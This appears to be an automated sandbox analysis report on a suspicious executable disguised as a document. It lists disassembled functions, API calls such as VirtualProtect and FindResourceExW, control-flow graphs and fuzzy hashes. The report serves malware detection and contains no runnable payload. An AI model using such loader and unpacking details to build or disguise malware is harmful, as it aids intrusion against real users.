                                                        • Instruction ID: a2f5518a1e3b0d5bfb903a5abef1ae5734da34d1693a103b44446658560ac980
                                                        • Opcode Fuzzy Hash: 2d46e8860e69e6ac36ff18df8a8a3087b92a57e74384365f257cb6ab2f5253b1
                                                        • Instruction Fuzzy Hash: CE5127B0644248FBCB10FBA8AC4AFED3B78AB15710F40406BF641A21D2C67D5AC6CB75
                                                        Function 0073BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 911 73bdf6-73be33 call 740650 914 73be35-73be37 911->914 915 73be3c-73be3e 911->915 916 73c613-73c61f call 73b4bf 914->916 917 73be40-73be5a call 73886a call 73889e call 737aa0 915->917 918 73be5f-73be8c 915->918 917->916 919 73be93-73be9a 918->919 920 73be8e-73be91 918->920 924 73beb8 919->924 925 73be9c-73beb3 call 73886a call 73889e call 737aa0 919->925 920->919 923 73bebe-73bec3 920->923 928 73bed2-73bee0 call 7449a2 923->928 929 73bec5-73becf call 7405df 923->929 924->923 960 73c604-73c607 925->960 941 73bee6-73bef8 928->941 942 73c1fe-73c210 928->942 929->928 941->942 944 73befe-73bf36 call 73869d GetConsoleMode 941->944 945 73c216-73c226 942->945 946 73c56b-73c588 WriteFile 942->946 944->942 967 73bf3c-73bf42 944->967 951 73c30d-73c312 945->951 952 73c22c-73c237 945->952 948 73c594-73c59a GetLastError 946->948 949 73c58a-73c592 946->949 954 73c59c 948->954 949->954 955 73c416-73c421 951->955 956 73c318-73c321 951->956 958 73c5ce-73c5e6 952->958 959 73c23d-73c24d 952->959 964 73c5a2-73c5a4 954->964 955->958 963 73c427 955->963 956->958 965 73c327 956->965 961 73c5f1-73c601 call 73889e call 73886a 958->961 962 73c5e8-73c5eb 958->962 968 73c253-73c256 959->968 966 73c611-73c612 960->966 961->960 962->961 969 73c5ed-73c5ef 962->969 970 73c431-73c446 963->970 972 73c5a6-73c5a8 964->972 973 73c609-73c60f 964->973 974 73c331-73c348 965->974 966->916 975 73bf44-73bf46 967->975 976 73bf4c-73bf6f GetConsoleCP 967->976 977 73c258-73c271 968->977 978 73c29c-73c2d3 WriteFile 968->978 969->966 980 73c44c-73c44e 970->980 972->958 982 73c5aa-73c5af 972->982 973->966 983 73c34e-73c351 974->983 975->942 975->976 984 73c1f3-73c1f9 976->984 985 73bf75-73bf7d 976->985 986 73c273-73c27d 977->986 987 73c27e-73c29a 977->987 978->948 979 73c2d9-73c2eb 978->979 979->964 988 73c2f1-73c302 979->988 989 73c450-73c466 980->989 990 73c48b-73c4cc WideCharToMultiByte 980->990 992 73c5b1-73c5c3 call 73889e call 73886a 982->992 993 73c5c5-73c5cc call 73887d 982->993 994 73c353-73c369 983->994 995 73c391-73c3da WriteFile 983->995 984->972 996 73bf87-73bf89 985->996 986->987 987->968 987->978 988->959 997 73c308 988->997 998 73c47a-73c489 989->998 999 73c468-73c477 989->999 990->948 1001 73c4d2-73c4d4 990->1001 992->960 993->960 1003 73c380-73c38f 994->1003 1004 73c36b-73c37d 994->1004 995->948 1006 73c3e0-73c3f8 995->1006 1007 73bf8f-73bfb1 996->1007 1008 73c11e-73c121 996->1008 997->964 998->980 998->990 999->998 1013 73c4da-73c50d WriteFile 1001->1013 1003->983 1003->995 1004->1003 1006->964 1016 73c3fe-73c40b 1006->1016 1009 73bfb3-73bfc8 1007->1009 1010 73bfca-73bfd6 call 7322a8 1007->1010 1011 73c123-73c126 1008->1011 1012 73c128-73c155 1008->1012 1017 73c024-73c036 call 744ea7 1009->1017 1031 73bfd8-73bfec 1010->1031 1032 73c01c-73c01e 1010->1032 1011->1012 1019 73c15b-73c15e 1011->1019 1012->1019 1020 73c50f-73c529 1013->1020 1021 73c52d-73c541 GetLastError 1013->1021 1016->974 1023 73c411 1016->1023 1041 73c1e8-73c1ee 1017->1041 1042 73c03c 1017->1042 1025 73c160-73c163 1019->1025 1026 73c165-73c178 call 746634 1019->1026 1020->1013 1028 73c52b 1020->1028 1030 73c547-73c549 1021->1030 1023->964 1025->1026 1033 73c1ba-73c1bd 1025->1033 1026->948 1045 73c17e-73c188 1026->1045 1028->1030 1030->954 1036 73c54b-73c563 1030->1036 1038 73bff2-73c007 call 744ea7 1031->1038 1039 73c1c5-73c1e0 1031->1039 1032->1017 1033->996 1037 73c1c3 1033->1037 1036->970 1043 73c569 1036->1043 1037->1041 1038->1041 1052 73c00d-73c01a 1038->1052 1039->1041 1041->954 1046 73c042-73c077 WideCharToMultiByte 1042->1046 1043->964 1048 73c18a-73c1a1 call 746634 1045->1048 1049 73c1ae-73c1b4 1045->1049 1046->1041 1050 73c07d-73c0a3 WriteFile 1046->1050 1048->948 1056 73c1a7-73c1a8 1048->1056 1049->1033 1050->948 1051 73c0a9-73c0c1 1050->1051 1051->1041 1055 73c0c7-73c0ce 1051->1055 1052->1046 1055->1049 1057 73c0d4-73c0ff WriteFile 1055->1057 1056->1049 1057->948 1058 73c105-73c10c 1057->1058 1058->1041 1059 73c112-73c119 1058->1059 1059->1049
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1ad3d77d7dffca7a1ad5b781f23799e7376c08607e0b526a7853e9854748a5e
                                                        • Instruction ID: 6189f35c67ea7ab4e342c9281b9144dd8f6271b6a3bb9836bf48d42396eedad6
                                                        • Opcode Fuzzy Hash: c1ad3d77d7dffca7a1ad5b781f23799e7376c08607e0b526a7853e9854748a5e
                                                        • Instruction Fuzzy Hash: 0A324E75B02228CFEB258F58DD456E9B7B5FB46310F1841D9E40AE7A42D738AE80CF52
                                                        Function 007129C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1301 7129c2-7129e2 1303 712a42-712a44 1301->1303 1304 7129e4-7129e7 1301->1304 1303->1304 1307 712a46 1303->1307 1305 7129e9-7129f0 1304->1305 1306 712a48 1304->1306 1308 7129f6-7129fb 1305->1308 1309 712aac-712ab4 PostQuitMessage 1305->1309 1311 782307-782335 call 71322e call 72ec33 1306->1311 1312 712a4e-712a51 1306->1312 1310 712a2b-712a33 NtdllDefWindowProc_W 1307->1310 1314 712a01-712a03 1308->1314 1315 78238f-7823a3 call 7557fb 1308->1315 1316 712a72-712a74 1309->1316 1317 712a39-712a3f 1310->1317 1346 78233a-782341 1311->1346 1318 712a53-712a54 1312->1318 1319 712a76-712a9d SetTimer RegisterClipboardFormatW 1312->1319 1321 712ab6-712ac5 call 711e58 1314->1321 1322 712a09-712a0e 1314->1322 1315->1316 1340 7823a9 1315->1340 1316->1317 1325 7822aa-7822ad 1318->1325 1326 712a5a-712a6d KillTimer call 712b94 call 712ac7 1318->1326 1319->1316 1323 712a9f-712aaa CreatePopupMenu 1319->1323 1321->1316 1328 712a14-712a19 1322->1328 1329 782374-78237b 1322->1329 1323->1316 1332 7822af-7822b1 1325->1332 1333 7822e3-782302 MoveWindow 1325->1333 1326->1316 1338 78235f-78236f call 755fdb 1328->1338 1339 712a1f-712a25 1328->1339 1329->1310 1336 782381-78238a call 74b31f 1329->1336 1342 7822d2-7822de SetFocus 1332->1342 1343 7822b3-7822b6 1332->1343 1333->1316 1336->1310 1338->1316 1339->1310 1339->1346 1340->1310 1342->1316 1343->1339 1347 7822bc-7822cd call 71322e 1343->1347 1346->1310 1350 782347-78235a call 712b94 call 713598 1346->1350 1347->1316 1350->1310
                                                        APIs
                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00712A33
                                                        • KillTimer.USER32(?,00000001), ref: 00712A5D
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00712A80
                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712A8B
                                                        • CreatePopupMenu.USER32 ref: 00712A9F
                                                        • PostQuitMessage.USER32(00000000), ref: 00712AAE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 157504867-2362178303
                                                        • Opcode ID: 2a388a54729f0bbfa653f4a66bb7cad882d7499e5bda543ef7da8b0ef4f5537f
                                                        • Instruction ID: 365c9a774515ff26d1f9dd47dfd7220f327983979dee02316c99082679e8100f
                                                        • Opcode Fuzzy Hash: 2a388a54729f0bbfa653f4a66bb7cad882d7499e5bda543ef7da8b0ef4f5537f
                                                        • Instruction Fuzzy Hash: 5D41F531214245ABDB34BF6C9C09BF93766EF14341F44C126F902921E3EA6D9CE39769
                                                        Function 0072E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1651 72e47b-72e50a call 71d3d2 GetVersionExW call 717e53 call 72e5f8 call 72e617 1660 7829f9-7829fc 1651->1660 1661 72e510-72e511 1651->1661 1664 7829fe 1660->1664 1665 782a15-782a19 1660->1665 1662 72e513-72e51e 1661->1662 1663 72e54d-72e55d call 72e6d1 1661->1663 1669 72e524-72e526 1662->1669 1670 78297f-782985 1662->1670 1682 72e582-72e59c 1663->1682 1683 72e55f-72e57c GetCurrentProcess call 72e70e 1663->1683 1666 782a01 1664->1666 1667 782a1b-782a24 1665->1667 1668 782a04-782a0d 1665->1668 1666->1668 1667->1666 1674 782a26-782a29 1667->1674 1668->1665 1675 78299a-7829a6 1669->1675 1676 72e52c-72e52f 1669->1676 1672 78298f-782995 1670->1672 1673 782987-78298a 1670->1673 1672->1663 1673->1663 1674->1668 1678 7829a8-7829ab 1675->1678 1679 7829b0-7829b6 1675->1679 1680 72e535-72e544 1676->1680 1681 7829c6-7829c9 1676->1681 1678->1663 1679->1663 1687 7829bb-7829c1 1680->1687 1688 72e54a 1680->1688 1681->1663 1689 7829cf-7829e4 1681->1689 1685 72e59e-72e5b2 call 72e694 1682->1685 1686 72e5ec-72e5f6 GetSystemInfo 1682->1686 1683->1682 1702 72e57e 1683->1702 1699 72e5e4-72e5ea GetSystemInfo 1685->1699 1700 72e5b4-72e5bc call 72e437 GetNativeSystemInfo 1685->1700 1691 72e5c9-72e5d5 1686->1691 1687->1663 1688->1663 1693 7829ee-7829f4 1689->1693 1694 7829e6-7829e9 1689->1694 1696 72e5d7-72e5da FreeLibrary 1691->1696 1697 72e5dc-72e5e1 1691->1697 1693->1663 1694->1663 1696->1697 1701 72e5be-72e5c2 1699->1701 1700->1701 1701->1691 1705 72e5c4-72e5c7 FreeLibrary 1701->1705 1702->1682 1705->1691
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 0072E4A7
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • GetCurrentProcess.KERNEL32(00000000,007ADC28,?,?), ref: 0072E567
                                                        • GetNativeSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5BC
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0072E5C7
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0072E5DA
                                                        • GetSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5E4
                                                        • GetSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                        • String ID:
                                                        • API String ID: 2717633055-0
                                                        • Opcode ID: 759e6d198a13a2858eabf986eca2e6668349ee4c19b53682a84971e3ac40e6bc
                                                        • Instruction ID: a09fae73abcd8a27b0dd6c33dfbc7cd488ae314bc197dedc103522d7f045b654
                                                        • Opcode Fuzzy Hash: 759e6d198a13a2858eabf986eca2e6668349ee4c19b53682a84971e3ac40e6bc
                                                        • Instruction Fuzzy Hash: 8361E2B18193D4CFCF15DF68A8C01E97FB46F2A304F2985D9D8449B24BD638C949CB66
                                                        Function 007131F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1723 7131f2-71320a CreateStreamOnHGlobal 1724 71322a-71322d 1723->1724 1725 71320c-713223 FindResourceExW 1723->1725 1726 713229 1725->1726 1727 7857d3-7857e2 LoadResource 1725->1727 1726->1724 1727->1726 1728 7857e8-7857f6 SizeofResource 1727->1728 1728->1726 1729 7857fc-785807 LockResource 1728->1729 1729->1726 1730 78580d-785815 1729->1730 1731 785819-78582b 1730->1731 1731->1726
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00713202
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00713219
                                                        • LoadResource.KERNEL32(?,00000000), ref: 007857D7
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007857EC
                                                        • LockResource.KERNEL32(?), ref: 007857FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 7c097e17aba5e4f8a7dcb80522aad390eefd05af6755c2d875ca7f6d3bb6676c
                                                        • Instruction ID: 77d17601519b174f14e375f8ebc460b5b2d8ecf3de40c9263fb48fde8da34232
                                                        • Opcode Fuzzy Hash: 7c097e17aba5e4f8a7dcb80522aad390eefd05af6755c2d875ca7f6d3bb6676c
                                                        • Instruction Fuzzy Hash: 1A117970200701BFE721AB69EC48FA77BB9FBC9B51F208029B50287290DB75DD418A60
                                                        Function 00751050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007510B8
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007510EE
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007510FF
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00751181
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: a1c88b665c4479a06d040a83f3f95b3b5bbd0ad09f9960f26a5213c72d3dbd34
                                                        • Instruction ID: 7b481bf5290f73bede3e39300d32469934b7fbca8cbe74a7d719fe0b34ce072f
                                                        • Opcode Fuzzy Hash: a1c88b665c4479a06d040a83f3f95b3b5bbd0ad09f9960f26a5213c72d3dbd34
                                                        • Instruction Fuzzy Hash: 63415C71600608EFDB15CF64C884B9A7BAAEF44352F5580ADEE099F205D7F9DD48CBA0
                                                        Function 0084B090 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 0084B1CA
                                                        • GetProcAddress.KERNEL32(?,00844FF9), ref: 0084B1E8
                                                        • ExitProcess.KERNEL32(?,00844FF9), ref: 0084B1F9
                                                        • VirtualProtect.KERNEL32(00710000,00001000,00000004,?,00000000), ref: 0084B247
                                                        • VirtualProtect.KERNEL32(00710000,00001000), ref: 0084B25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                        • String ID:
                                                        • API String ID: 1996367037-0
                                                        • Opcode ID: ac2d34f570266a11e6bf9a573981f59b8a944524944841aae106cf33dc930e73
                                                        • Instruction ID: 2228dbe49c4b5d97218e85950e098f0f5a64384178270a0a72bf765e9e60da8e
                                                        • Opcode Fuzzy Hash: ac2d34f570266a11e6bf9a573981f59b8a944524944841aae106cf33dc930e73
                                                        • Instruction Fuzzy Hash: 4A513572A5475E5BD7218EB8CCD0665B7A4FB52325B280738C6F2C73C5F7A4D80A87A0
                                                        Function 0072DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(0071C848,0071C848), ref: 0072DDA2
                                                        • FindFirstFileW.KERNEL32(0071C848,?), ref: 00784A83
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesFindFirst
                                                        • String ID:
                                                        • API String ID: 4185537391-0
                                                        • Opcode ID: 2b2a5d6df434d2a9997602d5aa9a0d2840a982809118c2d3c091d37d27584d4f
                                                        • Instruction ID: 701fa7b8d981af46a5e352e1695771a1ef2074113db5fc7735c333a9f88062b1
                                                        • Opcode Fuzzy Hash: 2b2a5d6df434d2a9997602d5aa9a0d2840a982809118c2d3c091d37d27584d4f
                                                        • Instruction Fuzzy Hash: 28E0D832454815678234673CEC0E8E9775C9A05338B104706F975C20F0EBB89D4186DE
                                                        Function 0071E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0071E279
                                                        • timeGetTime.WINMM ref: 0071E51A
                                                        • TranslateMessage.USER32(?), ref: 0071E646
                                                        • DispatchMessageW.USER32(?), ref: 0071E651
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0071E664
                                                        • LockWindowUpdate.USER32(00000000), ref: 0071E697
                                                        • DestroyWindow.USER32 ref: 0071E6A3
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0071E6BD
                                                        • Sleep.KERNEL32(0000000A), ref: 00785B15
                                                        • TranslateMessage.USER32(?), ref: 007862AF
                                                        • DispatchMessageW.USER32(?), ref: 007862BD
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007862D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 2641332412-570651680
                                                        • Opcode ID: 67f235f4517e1da3ead89b29968f63014c7d4d150ea59b22d3875c1182d99dd2
                                                        • Instruction ID: a4e2acd14478dceaff2b9b524477e9bb7e667fd0c03bf646c76b0638ce8db5fc
                                                        • Opcode Fuzzy Hash: 67f235f4517e1da3ead89b29968f63014c7d4d150ea59b22d3875c1182d99dd2
                                                        • Instruction Fuzzy Hash: 9662AF70544340DBDB24EF68C899BAA77E5BF44304F14496AFD468B2D2DB7CD888CB62
                                                        Function 00746A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___createFile.LIBCMT ref: 00746C73
                                                        • ___createFile.LIBCMT ref: 00746CB4
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00746CDD
                                                        • __dosmaperr.LIBCMT ref: 00746CE4
                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00746CF7
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00746D1A
                                                        • __dosmaperr.LIBCMT ref: 00746D23
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00746D2C
                                                        • __set_osfhnd.LIBCMT ref: 00746D5C
                                                        • __lseeki64_nolock.LIBCMT ref: 00746DC6
                                                        • __close_nolock.LIBCMT ref: 00746DEC
                                                        • __chsize_nolock.LIBCMT ref: 00746E1C
                                                        • __lseeki64_nolock.LIBCMT ref: 00746E2E
                                                        • __lseeki64_nolock.LIBCMT ref: 00746F26
                                                        • __lseeki64_nolock.LIBCMT ref: 00746F3B
                                                        • __close_nolock.LIBCMT ref: 00746F9B
                                                          • Part of subcall function 0073F84C: CloseHandle.KERNEL32(00000000,007BEEC4,00000000,?,00746DF1,007BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0073F89C
                                                          • Part of subcall function 0073F84C: GetLastError.KERNEL32(?,00746DF1,007BEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0073F8A6
                                                          • Part of subcall function 0073F84C: __free_osfhnd.LIBCMT ref: 0073F8B3
                                                          • Part of subcall function 0073F84C: __dosmaperr.LIBCMT ref: 0073F8D5
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __lseeki64_nolock.LIBCMT ref: 00746FBD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007470F2
                                                        • ___createFile.LIBCMT ref: 00747111
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0074711E
                                                        • __dosmaperr.LIBCMT ref: 00747125
                                                        • __free_osfhnd.LIBCMT ref: 00747145
                                                        • __invoke_watson.LIBCMT ref: 00747173
                                                        • __wsopen_helper.LIBCMT ref: 0074718D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
